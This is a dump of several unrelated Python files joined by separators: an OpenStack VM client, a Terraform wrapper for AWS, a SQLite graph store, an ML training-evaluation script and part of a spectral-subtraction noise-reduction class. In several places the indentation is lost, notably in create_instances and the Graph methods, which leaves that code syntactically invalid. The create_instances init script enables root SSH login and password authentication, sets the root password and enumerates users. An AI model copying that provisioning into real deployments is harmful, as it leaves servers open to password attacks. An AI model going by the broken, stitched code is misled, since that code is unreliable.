        obj = OpenStackVM(servers, self.__cache_images, self.__flavors_cache, self.__networks_cache, self.__users_cache)
        if arguments:  # do no cache custom requests
            return obj
        else:
            return self.__set_local_cache(LocalCacheType.SERVERS, obj)
    def get_server_by_id(self, _id: str or OpenStackVMInfo) -> OpenStackVMInfo:
        """
        Fetch a single server by id (or by an OpenStackVMInfo whose id is used).

        NOTE(review): unlike get_servers(), the users cache is not passed to
        OpenStackVM here — confirm owner resolution is not needed on this path.
        """
        if isinstance(_id, OpenStackVMInfo):
            _id = _id.id
        r = self._request(
            EndpointTypes.compute,
            f"/servers/{_id}",
            req_type=CurlRequestType.GET,
            is_json=True
        )
        servers = [ComputeServerInfo(serialized_obj=r["server"])]
        osvm = OpenStackVM(servers, self.__cache_images, self.__flavors_cache, self.__networks_cache)
        return osvm.items[0]
    @property
    def servers(self) -> OpenStackVM:
        """Full (cached) server list; shorthand for get_servers()."""
        return self.get_servers()
    @property
    def networks(self) -> OSNetwork:
        """Network topology (networks + subnets), cached in memory and persisted."""
        if self.__networks_cache:
            return self.__networks_cache
        params = {
            "limit": "1000"
        }
        networks = Networks(serialized_obj=self._request(
            EndpointTypes.network,
            "/networks",
            is_json=True,
            params=params,
            page_collection_name="networks"
        )).networks
        subnets = Subnets(serialized_obj=self._request(
            EndpointTypes.network,
            "/subnets",
            is_json=True,
            params=params,
            page_collection_name="subnets"
        )).subnets
        self.__networks_cache = OSNetwork().parse(networks, subnets)
        self._conf.cache.set(OSNetwork, self.__networks_cache.serialize())
        return self.__networks_cache
    def get_server_by_cluster(self,
                              search_pattern: str = "",
                              sort: bool = False,
                              filter_func: Callable[[OpenStackVMInfo], bool] = None,
                              no_cache: bool = False,
                              only_owned: bool = False,
                              ) -> Dict[str, List[OpenStackVMInfo]]:
        """
        Group servers by cluster name, optionally filtered.

        :param search_pattern: vm search pattern list
        :param sort: sort resulting list
        :param no_cache: force real server query, do not try to use cache
        :param filter_func: if return true - item would be filtered, false not
        :param only_owned: keep only servers owned by the logged-in user
        """
        _servers: Dict[str, List[OpenStackVMInfo]] = {}
        user_id = self._conf.user_id
        # if no cached queries available, execute limited query
        if no_cache or self.__get_local_cache(LocalCacheType.SERVERS) is None:
            servers = self.get_servers(arguments={
                "name": f"^{search_pattern}.*"
            }).items
            for server in servers:
                if only_owned and server.owner_id != user_id:
                    continue
                if filter_func and filter_func(server):  # need to be last in the filtering chain
                    continue
                if server.cluster_name not in _servers:
                    _servers[server.cluster_name] = []
                _servers[server.cluster_name].append(server)
        else:  # if we already requested the full list, no need for another call
            for server in self.servers:
                # prefix comparison, case-insensitive
                _sname = server.cluster_name.lower()[:len(search_pattern)]
                if search_pattern and search_pattern.lower() != _sname:
                    continue
                if only_owned and server.owner_id != user_id:
                    continue
                if filter_func and filter_func(server):  # need to be last in the filtering chain
                    continue
                if server.cluster_name not in _servers:
                    _servers[server.cluster_name] = []
                _servers[server.cluster_name].append(server)
        if sort:
            # sort servers within each cluster, then the clusters themselves
            for key in _servers:
                _servers[key] = sorted(_servers[key], key=lambda x: x.name)
            _servers = dict(sorted(_servers.items(), key=lambda x: x[0]))
        return _servers
    def get_server_console_log(self,
                               server_id: str or OpenStackVMInfo,
                               grep_by: str = None,
                               last_lines: int = 0
                               ) -> List[str]:
        """
        Fetch the VM console output, optionally filtered by a substring.

        NOTE(review): last_lines is sent as a query parameter while the action
        body carries "length": None — confirm the API honours the query form.
        """
        if isinstance(server_id, OpenStackVMInfo):
            server_id = server_id.id
        params = None
        if last_lines:
            params = {
                "length": last_lines
            }
        r = self._request(
            EndpointTypes.compute,
            f"/servers/{server_id}/action",
            req_type=CurlRequestType.POST,
            params=params,
            data={
                "os-getConsoleOutput": {
                    "length": None
                }
            },
            is_json=True
        )
        lines: List[str] = r["output"].split("\n")
        if grep_by:
            lines = [line for line in lines if grep_by in line]
        return lines
def _to_base64(self, s: str) -> str:
return str(base64.b64encode(s.encode("utf-8")), "utf-8")
def delete_image(self, image: DiskImageInfo) -> bool:
disk_id: str = image.id
try:
r = self._request(
EndpointTypes.image,
f"/images/{disk_id}",
req_type=CurlRequestType.DELETE
)
return True
except ValueError as e:
return False
def delete_instance(self, server: OpenStackVMInfo or ComputeServerInfo) -> bool:
server_id: str = server.id
try:
r = self._request(
EndpointTypes.compute,
f"/servers/{server_id}",
req_type=CurlRequestType.DELETE
)
return r is not None
except ValueError as e:
return False
    def get_keypairs(self, no_cache: bool = False) -> List[VMKeypairItemValue]:
        """Return all SSH keypairs, using the per-instance cache unless no_cache is set."""
        if no_cache:
            self.__invalidate_local_cache(LocalCacheType.KEYPAIR)
        _cache = self.__get_local_cache(LocalCacheType.KEYPAIR)
        if _cache:
            return list(_cache.values())
        try:
            r = self._request(
                EndpointTypes.compute,
                "/os-keypairs",
                req_type=CurlRequestType.GET,
                is_json=True
            )
            # cache as a name -> keypair map; callers get the values
            return list(self.__set_local_cache(
                LocalCacheType.KEYPAIR,
                {kp.keypair.name: kp.keypair for kp in VMKeypairs(serialized_obj=r).keypairs}
            ).values())
        except ValueError as e:
            self.__last_errors.append(str(e))
        return []
    def get_keypair(self, name: str, default: VMKeypairItemValue = None, no_cache: bool = False) -> VMKeypairItemValue or None:
        """
        Return the keypair *name*, or *default* when missing or the request fails.

        NOTE(review): no_cache only bypasses the cache read here — it does not
        refresh or invalidate the stored entry; confirm this is intended.
        """
        _cache = self.__get_local_cache(LocalCacheType.KEYPAIR)
        if not no_cache and _cache and name in _cache:
            return _cache[name]
        try:
            r = self._request(
                EndpointTypes.compute,
                f"/os-keypairs/{name}",
                req_type=CurlRequestType.GET,
                is_json=True
            )
            return VMKeypairItem(serialized_obj=r).keypair
        except ValueError as e:
            self.__last_errors.append(str(e))
        return default
    def delete_keypair(self, name: str) -> bool:
        """Delete the keypair *name*; False (with the error recorded) on failure."""
        try:
            r = self._request(
                EndpointTypes.compute,
                f"/os-keypairs/{name}",
                req_type=CurlRequestType.DELETE
            )
            return True
        except ValueError as e:
            self.__last_errors.append(str(e))
        return False
    def create_keypair(self, name: str, public_key: str) -> bool:
        """Upload a public key; True when the server echoes the same name back."""
        try:
            data = {
                "keypair": {
                    "name": name,
                    "public_key": public_key
                }
            }
            r = self._request(
                EndpointTypes.compute,
                "/os-keypairs",
                req_type=CurlRequestType.POST,
                is_json=True,
                data=data
            )
            return VMKeypairItem(serialized_obj=r).keypair.name == name
        except ValueError as e:
            self.__last_errors.append(str(e))
        return False
    def create_key(self, key: VMKeypairItemValue) -> bool:
        """Convenience wrapper: upload *key* via create_keypair."""
        return self.create_keypair(key.name, key.public_key)
    def __server_action(self, server: OpenStackVMInfo or ComputeServerInfo, action: ComputeServerActions,
                        action_data: dict = None) -> bool:
        """POST a server action (start/stop/reboot, ...); True when the API accepted it."""
        server_id: str = server.id
        try:
            action_raw = {
                action.value: action_data
            }
            r = self._request(
                EndpointTypes.compute,
                f"/servers/{server_id}/action",
                req_type=CurlRequestType.POST,
                is_json=True,
                data=action_raw
            )
            return True
        except ValueError as e:
            self.__last_errors.append(str(e))
        except Exception as e:
            # unexpected failure: surface it on stderr but keep the bool contract
            print(str(e), file=sys.stderr)
        return False
    def stop_instance(self, server: OpenStackVMInfo or ComputeServerInfo) -> bool:
        """Request a server stop; True when the API accepted the action."""
        return self.__server_action(server, ComputeServerActions.stop)
    def start_instance(self, server: OpenStackVMInfo or ComputeServerInfo) -> bool:
        """Request a server start; True when the API accepted the action."""
        return self.__server_action(server, ComputeServerActions.start)
    def reboot_instance(self, server: OpenStackVMInfo or ComputeServerInfo,
                        how: ComputeServerActionRebootType = ComputeServerActionRebootType.hard) -> bool:
        """Request a server reboot (hard by default); True when the API accepted it."""
        return self.__server_action(server, ComputeServerActions.reboot, {"type": how.value})
    def get_server_status(self, servers_id: str or OpenStackVMInfo) -> ServerState:
        """Fetch fresh server info from the API and return its status."""
        return self.get_server_by_id(servers_id).status
def create_instances(self, cluster_names: Union[List[str], str], image: OSImageInfo, flavor: OSFlavor,
password: str, ssh_key: VMKeypairItemValue = None, count: int = 1) -> List[OpenStackVMInfo]:
custom_user = "openstack"
init_script = f"""#!/bin/bash
echo 'PermitRootLogin yes'| cat - /etc/ssh/sshd_config > /tmp/sshd_config
echo 'PasswordAuthentication yes'| cat - /tmp/sshd_config > /etc/ssh/sshd_config && rm -f /tmp/sshd_config
useradd {custom_user}; echo -e "{password}\n{password}"|passwd {custom_user}
echo -e "{password}\n{password}"|passwd root
systemctl restart ssh.service
systemctl restart sshd.service
"""
if ssh_key:
init_script += f"""
KEY='{ssh_key.public_key}'
echo ${{KEY}} >/root/.ssh/authorized_keys
mkdir -p /home/{custom_user}/.ssh; echo '${{KEY}}' >/home/{custom_user}/.ssh/authorized_keys
"""
init_script += f"""
UID_MIN=$(grep -E '^UID_MIN' /etc/login.defs | tr -d -c 0-9)
USERS=$(awk -v uid_min="${{UID_MIN}}" -F: '$3 >= uid_min && $1 != "nobody" {{printf "%s ",$1}}' /etc/passwd)
echo "@users@: ${{USERS}}"
"""
if isinstance(cluster_names, str):
cluster_names: List[str] = [cluster_names]
if len(cluster_names) > 1: # we can create eighter bulk of cluster with one request or with different request
count: int = 1
created_servers: List[OpenStackVMInfo] = []
for cluster_name in cluster_names:
builder = VMCreateBuilder(cluster_name) \
.set_admin_pass(password) \
.set_image(image.base_image) \
.set_flavor(flavor) \
.add_network(self._conf.default_network) \
.set_user_data(init_script) \
.set_instances_count(count) \
.enable_reservation_id()
if ssh_key:
builder.set_key_name(ssh_key.name)
r = None
try:
r = self._request(
EndpointTypes.compute,
"/servers",
req_type=CurlRequestType.POST,
is_json=True,
data=builder.build().serialize()
)
except ValueError as e:
self.__last_errors.append(str(e))
return []
if (response := VMCreateResponse(serialized_obj=r)) and response.reservation_id:
servers = self.get_servers({"reservation_id": response.reservation_id})
created_servers.extend(list(servers.items))
else:
created_servers.append(self.get_server_by_id(response.server.id))
return created_servers
|
#! /usr/bin/env python3
# encoding: utf-8
'''
Wrapper to install Acpera with Terraform on AWS.
@author: <NAME>
@license: Apache License 2.0
@contact: <EMAIL>
'''
from argparse import ArgumentParser
from argparse import RawDescriptionHelpFormatter
from configparser import ConfigParser
from itertools import chain
import json
import os
import platform
import shutil
import sys
import time
import subprocess as sp
# Public API of this script (intentionally empty — it is used as a command only).
__all__ = []
__version__ = 0.1
__date__ = '2017-04-22'
__updated__ = '2017-04-22'
# Developer toggles: DEBUG injects argv flags, TESTRUN runs doctests,
# PROFILE dumps cProfile stats (see the __main__ block at the bottom).
DEBUG = 0
TESTRUN = 0
PROFILE = 0
class Terraform():
    """Thin wrapper around the bundled terraform binary.

    Improvement: the identical init/get/validate call sequence was duplicated
    in both properties; it is now factored into a private helper. The public
    interface (property access triggering the runs) is unchanged.
    """
    def __init__(self, args):
        # args.terraform_path must point at the terraform executable
        self.args = args

    def _run(self, *tf_args):
        """Invoke terraform with the given CLI arguments (blocking)."""
        sp.call([self.args.terraform_path, *tf_args])

    @property
    def aws(self):
        """terraform apply"""
        print("Terraform apply aws")
        self._run("init")
        self._run("get")
        self._run("validate")
        self._run("plan", "-target=module.aws")
        self._run("apply", "-target=module.aws")
        self._run("refresh")

    @property
    def destroy_aws(self):
        """terraform destroy"""
        print("Terraform destroy aws")
        self._run("init")
        self._run("get")
        self._run("validate")
        self._run("plan", "-destroy", "-target=module.aws")
        self._run("destroy", "-target=module.aws")
class CLIError(Exception):
    '''Generic exception to raise and log different fatal errors.'''
    def __init__(self, msg):
        # Bug fix: the original called super(CLIError).__init__(type(self)),
        # which initializes an unbound super proxy — the Exception base was
        # never initialized and args stayed empty. The zero-argument form
        # initializes the exception with its message.
        super().__init__(msg)
        self.msg = "E: %s" % msg
    def __str__(self):
        return self.msg
    def __unicode__(self):
        # Python 2 leftover; harmless under Python 3
        return self.msg
def is_os_64bit():
    """Return True when the host machine architecture name ends in '64'."""
    machine_name = platform.machine()
    return machine_name.endswith("64")
def main(argv=None):  # IGNORE:C0111
    '''Command line options.

    Parses the CLI arguments, resolves the bundled terraform binary for the
    current platform and dispatches the "aws" / "destroy_aws" action.
    Returns 0 on success/interrupt, 2 on unexpected errors.
    '''
    if argv is None:
        argv = sys.argv
    else:
        sys.argv.extend(argv)
    program_name = os.path.basename(sys.argv[0])
    program_version = "v%s" % __version__
    program_build_date = str(__updated__)
    program_version_message = '%%(prog)s %s (%s)' % (program_version, program_build_date)
    # first line of the module docstring doubles as the short description
    program_shortdesc = __import__('__main__').__doc__.split("\n")[1]
    program_license = '''%s
Created by <NAME> on %s.
Licensed under the Apache License 2.0
http://www.apache.org/licenses/LICENSE-2.0
Distributed on an "AS IS" basis without warranties
or conditions of any kind, either express or implied.
USAGE
''' % (program_shortdesc, str(__date__))
    try:
        # Setup argument parser
        parser = ArgumentParser(description=program_license, formatter_class=RawDescriptionHelpFormatter)
        parser.add_argument('-V', '--version', action='version', version=program_version_message)
        parser.add_argument('-d', '--domain', help='domain name', default='netanza.com')
        parser.add_argument("action", help="aws|destroy_aws")
        # Process arguments
        args = parser.parse_args()
        action = args.action
        # pick the bundled terraform binary matching the host platform
        if os.name == "posix":
            args.terraform_path = os.path.join("contrib", "terraform-linux", "terraform")
        elif is_os_64bit():
            args.terraform_path = os.path.join("contrib", "terraform-win64", "terraform.exe")
        else:
            args.terraform_path = os.path.join("contrib", "terraform-win32", "terraform.exe")
        t = Terraform(args)
        if action == "aws":
            t.aws
        elif action == "destroy_aws":
            t.destroy_aws
        else:
            print("Unknown action")
        return 0
    except KeyboardInterrupt:
        ### handle keyboard interrupt ###
        return 0
    except Exception as e:
        if DEBUG or TESTRUN:
            raise(e)
        indent = len(program_name) * " "
        sys.stderr.write(program_name + ": " + repr(e) + "\n")
        sys.stderr.write(indent + "  for help use --help")
        return 2
if __name__ == "__main__":
    if DEBUG:
        # NOTE(review): "-v" and "-r" are not defined options ("-V" is), so
        # argparse would exit with an error in DEBUG mode — confirm intent.
        sys.argv.append("-h")
        sys.argv.append("-v")
        sys.argv.append("-r")
    if TESTRUN:
        import doctest
        doctest.testmod()
    if PROFILE:
        # dump cProfile stats to profile_stats.txt and exit without running main()
        import cProfile
        import pstats
        profile_filename = '_profile.txt'
        cProfile.run('main()', profile_filename)
        statsfile = open("profile_stats.txt", "wb")
        p = pstats.Stats(profile_filename, stream=statsfile)
        stats = p.strip_dirs().sort_stats('cumulative')
        stats.print_stats()
        statsfile.close()
        sys.exit(0)
    sys.exit(main())
|
import json
import sqlite3
from typing import Dict, List, Set, Union
from .database import Database
from .edge import Edge
from .node import Node
class Graph:
"""Graph representation from SQLite db."""
    def __init__(self, db_path: str) -> None:
        """Database initialization from new or existing path.

        Params:
            db_path (str): Path to a new SQLite database
                or existing database.
        """
        self.database = Database(db_path=db_path, row_factory=True)
        # eagerly materialize the whole graph from the DB into memory
        self.schemas = self._all_schemas()
        self.nodes = self._all_schema_nodes()
        self.edges = self._all_schema_edges()
def _all_schemas(self) -> Set[str]:
"""Fetch all schemas on init.
If the database already exists then we
need a `Set` of all schema names that exist.
This requires de-duping the `<schema_name>_nodes`
and `<schema_name>_edges`. We then split the
prefix out of the table name.
"""
schema_rows = self.database.get_schemas()
schema_list = [schema["name"] for schema in schema_rows]
return set(
[schema_name.split("_")[0] for schema_name in schema_list]
)
def _all_schema_nodes(self) -> Dict[str, Node]:
"""Fetch all nodes for all schemas.
Gets all nodes from every schema that we have.
Params:
None
Returns:
nodes (Dict[str, Node]): Dict of node IDs and node objects
or an empty dictionary.
"""
nodes = {}
for schema_name in self.schemas:
node_rows = self.database.get_all_nodes(schema_name=schema_name)
for node_row in node_rows:
node = self._create_node(schema_name=schema_name, node_row=node_row)
nodes[node.id] = node
return nodes
def _all_schema_edges(self) -> List[Edge]:
"""Fetch all edges for all schemas.
Gets all edges from every schema that we have.
Params:
None
Returns:
edges (List[Edge]): List of edge objects or an empty list.
"""
edges = []
for schema_name in self.schemas:
edge_rows = self.database.get_all_edges(schema_name=schema_name)
for edge_row in edge_rows:
edge = self._create_edge(schema_name=schema_name, edge_row=edge_row)
edges.append(edge)
return edges
    def add_schema(self, schema_name: str) -> None:
        """Adds a schema.

        Params:
            schema_name (str): Schema name for the DB.
        Returns:
            None
        """
        self.database.add_schema(schema_name=schema_name)
        # keep the in-memory set in sync with the DB
        self.schemas.add(schema_name)
    def add_node(self, schema_name: str, node: Node) -> None:
        """Adds a node.

        Params:
            schema_name (str): Schema name for the DB.
            node (Node): A node instance to add to the db
                and graph.
        Returns:
            None
        """
        self.database.add_node(
            schema_name=schema_name,
            node_id=node.id,
            node_body=node.body
        )
        # re-read the stored row so the in-memory node matches what the DB kept
        new_node = self.database.get_node(schema_name=schema_name, node_id=node.id)
        self.nodes[new_node["id"]] = self._create_node(
            schema_name=schema_name,
            node_row=new_node,
        )
    def add_edge(self, edge: Edge) -> None:
        """Adds an edge.

        Params:
            edge (Edge): An edge instance to add to the db
                and graph.
        Returns:
            None
        """
        self.database.add_edge(
            schema_name=edge.schema_name,
            source_id=edge.source.id,
            target_id=edge.target.id,
            source_schema_name=edge.source_schema_name,
            target_schema_name=edge.target_schema_name,
            properties=edge.properties,
        )
        # re-read the stored row so the in-memory edge matches what the DB kept
        edge_data = self.database.get_edge(
            schema_name=edge.schema_name,
            source_id=edge.source.id,
            target_id=edge.target.id,
        )
        self.edges.append(
            self._create_edge(
                schema_name=edge.schema_name,
                edge_row=edge_data,
            )
        )
    def update_node(self, node: Node) -> None:
        """Updates a node in the DB and graph.

        Params:
            node (Node): Updates a node in the DB.
                Be sure to update the `body` before
                passing it to be updated.
        Returns:
            None
        """
        self.database.update_node(
            schema_name=node.schema_name,
            node_id=node.id,
            node_body=node.body,
        )
        # re-read the stored row and replace the in-memory node with it
        updated_node_data = self.database.get_node(
            schema_name=node.schema_name,
            node_id=node.id
        )
        updated_node = self._create_node(
            schema_name=node.schema_name,
            node_row=updated_node_data,
        )
        self.nodes[updated_node.id] = updated_node
def update_edge(self, edge: Edge) -> None:
    """Update an edge in the DB and refresh its cached copy in the graph.

    Does not change the ``source`` or ``target`` of the edge.

    Params:
        edge (Edge): Edge whose ``properties`` have already been
            modified; the stored row is overwritten with them.

    Returns:
        None
    """
    self.database.update_edge(
        schema_name=edge.schema_name,
        source_id=edge.source.id,
        target_id=edge.target.id,
        properties=edge.properties,
    )
    updated_row = self.database.get_edge(
        schema_name=edge.schema_name,
        source_id=edge.source.id,
        target_id=edge.target.id,
    )
    updated_edge = self._create_edge(
        schema_name=edge.schema_name,
        edge_row=updated_row,
    )
    # Rebuild the list instead of calling remove() inside a `for` over the
    # same list: the original loop also shadowed the `edge` parameter and
    # could skip the element following each removal.
    self.edges = [
        existing for existing in self.edges
        if not existing.__eq__(updated_edge.source, updated_edge.target)
    ]
    self.edges.append(updated_edge)
def get_schema(self, schema_name: str) -> Union[str, None]:
    """Return *schema_name* if it is known to the graph, else ``None``.

    Params:
        schema_name (str): Schema name to check.

    Returns:
        str | None: The schema name, if it exists.
    """
    return schema_name if schema_name in self.schemas else None
def get_node(self, node_id: str) -> Union[Node, None]:
    """Fetch a node by its ID.

    Params:
        node_id (str): ID of a node.

    Returns:
        node (Node | None): Node object, if it exists.
    """
    # dict.get() avoids the KeyError the original `self.nodes[node_id]`
    # lookup raised for unknown IDs; `or None` preserves the original
    # truthiness test (a falsy cached value is reported as None).
    return self.nodes.get(node_id) or None
def get_edge(self, source: Node, target: Node) -> Union[Edge, None]:
    """Fetch the edge connecting *source* to *target*, if any.

    Params:
        source (Node): Source node of the edge.
        target (Node): Target node of the edge.

    Returns:
        edge (Edge | None): Edge object, if it exists.
    """
    # First matching edge wins; None when no edge matches.
    return next(
        (
            candidate for candidate in self.edges
            if candidate.__eq__(source=source, target=target)
        ),
        None,
    )
def delete_schema(self, schema_name: str) -> None:
    """Remove a schema from the DB and the in-memory graph.

    Raises KeyError (via set.remove) when the schema is not cached.
    """
    self.database.delete_schema(schema_name=schema_name)
    self.schemas.remove(schema_name)
def delete_node(self, node: Node) -> None:
    """Remove a node from the DB and the in-memory graph."""
    self.database.delete_node(schema_name=node.schema_name, node_id=node.id)
    # `del` matches the original pop(): KeyError when the node is not cached.
    del self.nodes[node.id]
def delete_edge(self, edge: Edge) -> None:
    """Remove an edge from the DB and the in-memory graph.

    Params:
        edge (Edge): Edge whose schema and endpoint IDs identify the
            row to delete.

    Returns:
        None
    """
    self.database.delete_edge(
        schema_name=edge.schema_name,
        source_id=edge.source.id,
        target_id=edge.target.id,
    )
    # Rebuild the list instead of calling remove() inside a `for` over the
    # same list, which can skip the element that follows each removal.
    self.edges = [
        existing for existing in self.edges
        if not edge.__eq__(existing.source, existing.target)
    ]
def _create_node(self, schema_name: str, node_row: sqlite3.Row) -> Node:
    """Build a ``Node`` from a database row.

    Params:
        schema_name (str): Schema name to use.
        node_row (sqlite3.Row): A SQLite database row.

    Returns:
        node (Node): A node object.
    """
    # The body is stored as JSON text; decode it before constructing.
    decoded_body = json.loads(node_row["body"])
    return Node(schema_name=schema_name, id=node_row["id"], body=decoded_body)
def _create_edge(self, schema_name: str, edge_row: sqlite3.Row) -> Edge:
    """Build an ``Edge`` (resolving its endpoint nodes) from a database row.

    Params:
        schema_name (str): Schema name to use.
        edge_row (sqlite3.Row): A SQLite database row.

    Returns:
        edge (Edge): A edge object.
    """
    # Endpoints are looked up in the in-memory node cache by ID.
    source_node = self.get_node(edge_row["source"])
    target_node = self.get_node(edge_row["target"])
    return Edge(
        schema_name=schema_name,
        source=source_node,
        target=target_node,
        properties=json.loads(edge_row["properties"]),
    )
|
<gh_stars>0
import numpy as np
import pandas as pd
import argparse
import copy
import pathlib
import pdb
import pickle
from model_eval import model_evaluation, utils
def main():
    """Evaluate GMP/MCSH-featurized models on the aspirin dataset.

    Parses ``--max_order`` from the command line, assembles an AmpTorch
    configuration whose MCSH descriptor includes all orders up to that
    value, then runs several training iterations over five pre-split
    train/test dataset pairs, printing test errors after each iteration.
    Paths are cluster-specific (PACE storage); presumably run as a batch
    job on that cluster — confirm before reusing elsewhere.
    """
    parser = argparse.ArgumentParser(description="Run evaluation on aspirin dataset")
    parser.add_argument("--max_order", type=int, required=True,
                        help="number of GMP orders to include")
    args = parser.parse_args()
    args_dict = vars(args)

    #sigmas = [0.25, 1.0, 2.0]
    sigmas = [0.25, 0.75, 1.5, 2.0]

    # Angular group indices available for each MCSH order (keys are the
    # order as a string, matching what the fp_params schema expects).
    all_mcsh_groups = {"0": {"groups": [1]},
                       "1": {"groups": [1]},
                       "2": {"groups": [1,2]},
                       "3": {"groups": [1,2,3]},
                       "4": {"groups": [1,2,3,4]},
                       "5": {"groups": [1,2,3,4,5]},
                       "6": {"groups": [1,2,3,4,5,6,7]},
                       "7": {"groups": [1,2,3,4,5,6,7,8]},
                       "8": {"groups": [1,2,3,4,5,6,7,8,9,10]}}

    # Include every order from 0 up to (and including) --max_order, each
    # with the same radial sigmas.
    MCSHs = {}
    for order in range(args_dict["max_order"] + 1):
        order_str = str(order)
        MCSHs[order_str] = all_mcsh_groups[order_str]
        MCSHs[order_str]["sigmas"] = sigmas

    top_dir = pathlib.Path("/storage/home/hcoda1/7/plai30")
    gaussians_dir = top_dir / "sandbox/config/valence_gaussians"
    # Pseudo-density gaussian files per element; cutoff in the units
    # expected by AmpTorch (presumably Angstrom — confirm).
    gmp_params = {
        "atom_gaussians": {
            "C": str(gaussians_dir / "C_pseudodensity_4.g"),
            "H": str(gaussians_dir / "H_pseudodensity_2.g"),
            "O": str(gaussians_dir / "O_pseudodensity_4.g")
        },
        "MCSHs": MCSHs,
        "cutoff": 10
    }
    elements = ["C","H","O"]
    # Full AmpTorch training configuration (model, optimizer, dataset, cmd).
    amptorch_config = {
        "model": {
            "name":"singlenn",
            "get_forces": False,
            "num_layers": 3,
            "num_nodes": 50,
            "batchnorm": True
        },
        "optim": {
            "gpus": 0,
            "force_coefficient": 0.0,
            "lr": 1e-3,
            "batch_size": 256,
            "epochs": 500,
            "loss": "mae",
        },
        "dataset": {
            "val_split": 0.2,
            "elements": elements,
            "fp_scheme": "mcsh",
            "fp_params": gmp_params,
            "save_fps": False,
            "scaling": {
                "type": "normalize",
                "range": (0, 1),
                "elementwise":False
            }
        },
        "cmd": {
            "debug": False,
            "identifier": "test",
            "verbose": True,
            "logger": False
        }
    }
    base_config = {
        "evaluation_type": "train_test_split",
        "seed": 1,
        "amptorch_config": amptorch_config
    }

    run_name = "convergence_order_{}".format(args_dict["max_order"])

    # One config + dataset pair per evaluation trial; seeds are fixed to 1
    # for every trial, so trials differ only in their data split files.
    num_eval_trials = 5
    test_configs = []
    test_datasets = []
    for i in range(num_eval_trials):
        curr_test_config = copy.deepcopy(base_config)
        curr_test_config["name"] = "{}_{}".format(run_name, i + 1)
        curr_test_config["seed"] = 1
        curr_test_config["amptorch_config"]["cmd"]["seed"] = 1
        test_configs.append(curr_test_config)
        curr_train_data_file = str(top_dir / "p-amedford6-0/data/aspirin/aspirin_train_data_{}.p".format(i + 1))
        curr_test_data_file = str(top_dir / "p-amedford6-0/data/aspirin/aspirin_test_data_{}.p".format(i + 1))
        curr_dataset = model_evaluation.dataset(train_data_files=[curr_train_data_file], test_data_files=[curr_test_data_file])
        test_datasets.append(curr_dataset)

    curr_dir = pathlib.Path(__file__).parent.absolute()
    save_model_dir = curr_dir / "{}_model_checkpoints".format(run_name)
    num_training_iters = 10
    for i in range(num_training_iters):
        print("Evaluating models for training iteration {}".format(i + 1))
        workspace = curr_dir / "workspace_{}_{}".format(run_name, i + 1)
        checkpoint_dirs = []
        if i != 0:
            #find checkpoint directories (resume each config from its last run)
            for config in test_configs:
                checkpoint_dirs.append(utils.get_checkpoint_dir(save_model_dir / config["name"]))
        #if this is the last iteration, no need to save models
        if i >= num_training_iters - 1:
            save_model_dir = ""
        results = model_evaluation.evaluate_models(datasets=test_datasets, config_dicts=test_configs,
                                                   enable_parallel=True, workspace=workspace,
                                                   time_limit="03:00:00", mem_limit=2, conda_env="amptorch",
                                                   save_model_dir=save_model_dir, checkpoint_dirs=checkpoint_dirs)
        #print results
        errors = [metrics.test_error for metrics in results]
        print("Test errors after training iteration {}: {}".format(i + 1, errors))
        print("MAE: {}".format(np.mean(errors)))

if __name__ == "__main__":
    main()
|
<reponame>HemaZ/pyroomacoustics
# Single Channel Noise Removal using Spectral Subtraction
# Copyright (C) 2019 <NAME>, <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# You should have received a copy of the MIT License along with this program. If
# not, see <https://opensource.org/licenses/MIT>.
import numpy as np
class SpectralSub(object):
    """
    Here we have a class for performing **single channel** noise reduction via
    spectral subtraction. The instantaneous signal energy and noise floor is
    estimated at each time instance (for each frequency bin) and this is used
    to compute a gain filter with which to perform spectral subtraction.
    For a given frame `n`, the gain for frequency bin `k` is given by:
    .. math::
        G[k, n] = \max \\left \{ \\left ( \dfrac{P[k, n]-\\beta P_N[k, n]}{P[k, n]} \\right )^\\alpha, G_{min} \\right \},
    where :math:`G_{min} = 10^{-(db\_reduc/20)}` and :math:`db\_reduc` is the
    maximum reduction (in dB) that we are willing to perform for each bin (a
    high value can actually be detrimental, see below). The instantaneous
    energy :math:`P[k,n]` is computed by simply squaring the frequency
    amplitude at the bin `k`. The time-frequency decomposition of the input
    signal is typically done with the STFT and overlapping frames. The noise
    estimate :math:`P_N[k, n]` for frequency bin `k` is given by looking back a
    certain number of frames :math:`L` and selecting the bin with the lowest
    energy:
    .. math::
        P_N[k, n] = \min_{[n-L, n]} P[k, n]
    This approach works best when the SNR is positive and the noise is rather
    stationary. An alternative approach for the noise estimate (also in the
    case of stationary noise) would be to apply a lowpass filter for each
    frequency bin.
    With a large suppression, i.e. large values for :math:`db\_reduc`, we can
    observe a typical artefact of such spectral subtraction approaches, namely
    "musical noise".
    `Here <https://www.vocal.com/noise-reduction/musical-noise/>`_ is nice
    article about noise reduction and musical noise.
    Adjusting the constants :math:`\\beta` and :math:`\\alpha` also presents a
    trade-off between suppression and undesirable artefacts, i.e. more
    noticeable musical noise.
    Below is an example of how to use this class to emulate a streaming/online
    input. A full example can be found
    `here <https://github.com/LCAV/pyroomacoustics/blob/master/examples/noise_reduction_spectral_subtraction.py>`__.
    ::
        # initialize STFT and SpectralSub objects
        nfft = 512
        stft = pra.transform.STFT(nfft, hop=nfft//2,
                                  analysis_window=pra.hann(nfft))
        scnr = pra.denoise.SpectralSub(nfft, db_reduc=10, lookback=5,
                                       beta=20, alpha=3)
        # apply block-by-block
        for n in range(num_blocks):
            # go to frequency domain for noise reduction
            stft.analysis(mono_noisy)
            gain_filt = scnr.compute_gain_filter(stft.X)
            # estimating input convolved with unknown response
            mono_denoised = stft.synthesis(gain_filt*stft.X)
    There also exists a "one-shot" function.
    ::
        # import or create `noisy_signal`
